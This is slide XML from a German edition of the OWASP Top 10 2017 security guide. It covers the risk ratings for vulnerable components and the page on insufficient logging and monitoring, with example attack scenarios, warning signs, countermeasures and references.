                        </a:rPr>
                        <a:t>Ausnutzbarkeit:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="500" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" noProof="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de-DE" sz="1100" b="1" noProof="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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de-DE" sz="1000" b="1" baseline="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Verbreitung: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" noProof="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de-DE" sz="1100" b="0" baseline="0" noProof="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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de-DE" sz="1000" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Auffindbarkeit: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" noProof="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de-DE" sz="1100" b="0" kern="1200" baseline="0" noProof="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol"/>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de-DE" sz="1000" b="1" baseline="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technisch: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" noProof="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de-DE" sz="1100" b="0" baseline="0" noProof="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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de-DE" sz="1000" b="1" noProof="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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de-DE" sz="900" noProof="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Für viele bekannte Schwachstellen ist es sehr einfach, existierende fertige Angriffe zu finden, für andere jedoch ist es erforderlich, unter gezieltem Aufwand einen maßgeschneiderten Angriffscode zu entwickeln.</a:t>
                      </a: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l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="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Dieses Problem ist sehr weit verbreitet. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0" err="1">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Komponentenlastige</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="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Entwicklungspattern können dazu führen, dass Entwicklerteams nicht einmal mehr verstehen, welche Komponenten sie in ihrer Applikation oder API benutzen, geschweige denn diese aktuell halten können.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="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Es existieren einige Scanner, wie zum Beispiel retire.js, die bei der Erkennung helfen. Das Ermitteln der Ausnutzbarkeit erfordert jedoch zusätzlichen Aufwand.</a:t>
                      </a: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0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="90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Während einige bekannte Schwach-stellen zu geringen Auswirkungen führten, basieren einige der größten bisherigen Sicherheitsvorfälle auf dem Ausnutzen bekannter Schwach-stellen in benutzen Komponenten.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="90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Abhängig von den zu beschützenden Assets sollte dieses Risiko ggf. ganz oben auf der Liste stehen.</a:t>
                      </a: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32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Mögliche Angriffsszenarien</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Eine Open-Source Projektforums-Software, die von einem kleinen Team betrieben wird, wurde auf Grund eines Fehlers in der Software angegriffen. Die Angreifer konnten das interne Quellcode-Repository mit der nächsten Version und allen Inhalten löschen. Obwohl der Quellcode wiederhergestellt werden konnte, führte das Fehlen von Monitoring, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Protokollie-rung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> und Warnmeldungen zu weit schwerwiegenderen Folgen. Als Konsequenz ist das Projektforum inzwischen nicht mehr aktiv.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Angreifer scannen nach Nutzern mit häufig benutzten, einfachen Passwörtern. Sie können alle betroffenen Accounts übernehmen. Für alle anderen Nutzer hinterlässt dieser Angriff nur 1 falschen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Loginversuch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Nach einiger Zeit könnte der Angriff mit anderen Passwörtern wiederholt werden.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Ein großer US-Großhändler verfügte über eine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, die Mail-Anhänge auf Schadsoftware überprüfte.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> entdeckte potenziell gefährliche Software, aber niemand reagierte auf diese Meldung. Der Sicherheitsvorfall wurde jedoch erst erkannt, als die Hausbank betrügerische Kreditkarten-Transaktionen meldete.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16738"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Ist die Anwendung verwundbar?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unzureichende Protokollierungs-, Erkennungs- und Monitoring- Maßnahmen sowie fehlende aktive Reaktionen auf Vorfälle treten ständig auf:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Auditierbare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Ereignisse wie erfolgreiche oder fehlgeschlagene Log-ins oder wichtige Transaktionen werden nicht protokolliert.</a:t>
            </a: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Warnungen und Fehler erzeugen keine, unzureichende oder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>uneindeutige</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Protokoll-Einträge.</a:t>
            </a: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Protokolle von Anwendungen und Schnittstellen werden nicht ausreichend hinsichtlich verdächtiger Aktivitäten überprüft.</a:t>
            </a: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Protokolle werden nur lokal gespeichert.</a:t>
            </a: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Geeignete Alarmierungs-Schwellen und Eskalations-Prozesse als Reaktion auf (potentielle) Vorfälle liegen nicht vor oder sind nicht wirksam.</a:t>
            </a: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Penetration-Tests und Scans mit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Werkzeugen (wie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) lösen keine Alarme aus.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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Die eingesetzten Überwachungsverfahren sind nicht in der Lage aktive Angriffe zu erkennen und in Echtzeit oder nahezu Echtzeit Alarm auszulösen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wenn Ihre Systeme Protokollierungs- und Alarmierungs-Nachrichten Benutzern oder Angreifern preisgeben, kann dies zum Abfluss von Daten führen (siehe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A3:2017-Verlust der Vertraulichkeit sensibler Daten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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Referenzen</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Implement Logging and Intrusion Detection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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </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rPr>
              <a:t>V8 Logging and Monitoring</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Testing Guide: Testing for Error Code (OTG-ERR-001)</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Cheat Sheet: Logging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ct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Andere</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId11"/>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CWE-223: Omission of Security-relevant Information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CWE-778: Insufficient Logging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="900" u="sng"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Wie kann ich das verhindern?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Führen Sie für alle von Anwendungen gespeicherten oder prozessierten Daten folgende Maßnahmen durch:</a:t>
            </a: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Stellen Sie sicher, dass alle erfolglosen Login- und Zugriffs-Versuche und Fehler bei der serverseitigen Eingabevalidierung mit aussagekräftigem Benutzerkontext protokolliert werden, um verdächtige oder schädliche Accounts zu identifizieren. Halten Sie diese Informationen ausreichend lange vor, um auch später forensische Analysen vorzunehmen zu können.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin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rPr>
              <a:t>Stellen Sie sicher, dass Protokollierungen in einem Format erstellt werden, die eine einfache Verarbeitung durch zentrale Protokollanalyse- und -managementwerkzeuge ermöglicht.</a:t>
            </a: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rPr>
              <a:t>Speichern Sie für wichtige Transaktionen Audit-Trails mit Integritätsschutz, um Verfälschung oder ein Löschen zu verhindern, z.B. durch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Einsatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>von</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Datenbanktabellen, die nur das Anhängen von Datensätzen zulassen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="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Richten Sie wirksame Monitoring- und Alarmierungs-Verfahren ein, damit verdächtige Aktivitäten zeitnah entdeckt und bearbeitet werden.</a:t>
            </a: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Etablieren Sie Notfall- und Wiederherstellungspläne für Sicherheitsvorfälle, z.B. auf Basis von </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>NIST 800-61 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>rev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t> 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">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de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Es gibt kommerzielle o. Open-Source-Frameworks zum Schutz Ihrer Anwendungen, wie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
